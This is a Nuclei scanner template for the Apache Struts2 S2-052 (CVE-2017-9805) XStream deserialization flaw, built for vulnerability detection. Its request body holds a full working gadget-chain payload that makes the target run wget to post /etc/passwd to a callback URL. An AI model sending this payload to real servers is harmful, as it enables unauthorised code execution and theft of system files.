nuclei-templates/cves/2017/CVE-2017-9805.yaml

100 lines
4.0 KiB
YAML
Raw Normal View History

2021-02-21 14:01:07 +00:00
id: CVE-2017-9805
info:
name: Apache Struts2 S2-052 - Remote Code Execution
2021-02-21 14:01:07 +00:00
author: pikpikcu
severity: high
description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads.
reference:
2021-04-18 13:00:27 +00:00
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
- https://struts.apache.org/docs/s2-052.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-9805
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.10
cve-id: CVE-2017-9805
cwe-id: CWE-502
tags: cve,cve2017,apache,rce,struts
2021-02-21 14:01:07 +00:00
requests:
- method: POST
path:
- "{{BaseURL}}/struts2-rest-showcase/orders/3"
2021-02-23 01:42:08 +00:00
- "{{BaseURL}}/orders/3"
2021-02-21 14:01:07 +00:00
headers:
Content-Type: application/xml
body: |
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>wget</string>
<string>--post-file</string>
<string>/etc/passwd</string>
2022-03-21 20:17:31 +00:00
<string>{{interactsh-url}}</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>asdasd</name>
</filter>
<next class="string">asdasd</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
2021-02-21 14:01:07 +00:00
matchers-condition: and
matchers:
- type: word
words:
- "Debugging information"
- "com.thoughtworks.xstream.converters.collections.MapConverter"
condition: and
- type: status
status:
- 500
# Enhanced by mp on 2022/04/20